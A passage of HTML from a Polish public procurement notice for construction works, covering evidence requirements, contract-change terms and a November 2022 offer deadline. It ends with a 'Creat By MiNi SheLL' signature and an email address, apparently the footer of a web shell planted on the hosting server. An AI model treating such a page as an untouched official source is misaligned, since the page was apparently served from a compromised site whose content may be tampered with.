wyklucza wykonawcę.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>a. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich <br/>3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty. Wzór formularza Wykaz robót stanowi załącznik nr 4 do SWZ.<br/>2. Wykonawca, może w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Szczegółowe wymagania dotyczące składania ofert przez wykonawców wspólnie ubiegających się o zamówienie określono w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający oświadcza, iż przewiduje możliwość zmian umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadkach wystąpienia okoliczności wymienionych w niniejszym paragrafie.<br/>2. Zamawiający dopuszcza możliwość zmiany terminu wykonania przedmiotu umowy określonego w § 3 o okres nie wykonywania przedmiotu umowy, spowodowanego jedną z następujących przyczyn:<br/>1) wynikające z opóźnień w uzyskaniu decyzji administracyjnych, których pozyskanie następuje w terminie niezależnym od Wykonawcy,<br/>2) wystąpienia warunków atmosferycznych uniemożliwiających prawidłowe wykonanie robót z powodu technologii realizacji prac objętych umową wymagającej konkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność,<br/>3) niemożności wykonania robót, gdy uprawniony organ nie dopuszcza do wykonania robót lub wstrzymuje wykonanie robót z przyczyn niezawinionych przez Wykonawcę,<br/>3. Strony dopuszczają zmianę postanowień umowy w stosunku do treści oferty Wykonawcy poprzez zmianę sposobu wykonania przedmiotu umowy w przypadku konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,<br/>4. W przypadku zmiany ustawowej stawek podatku od towarów i usług w trakcie realizacji umowy dla robót objętych przedmiotem umowy – w zakresie dotyczącym niezrealizowanej części przedmiotu umowy wynagrodzenie zostanie zmodyfikowane proporcjonalnie do zmiany stawki podatku VAT. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP udostępnionego również na miniPortalu.Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej po adresem: https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-30 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com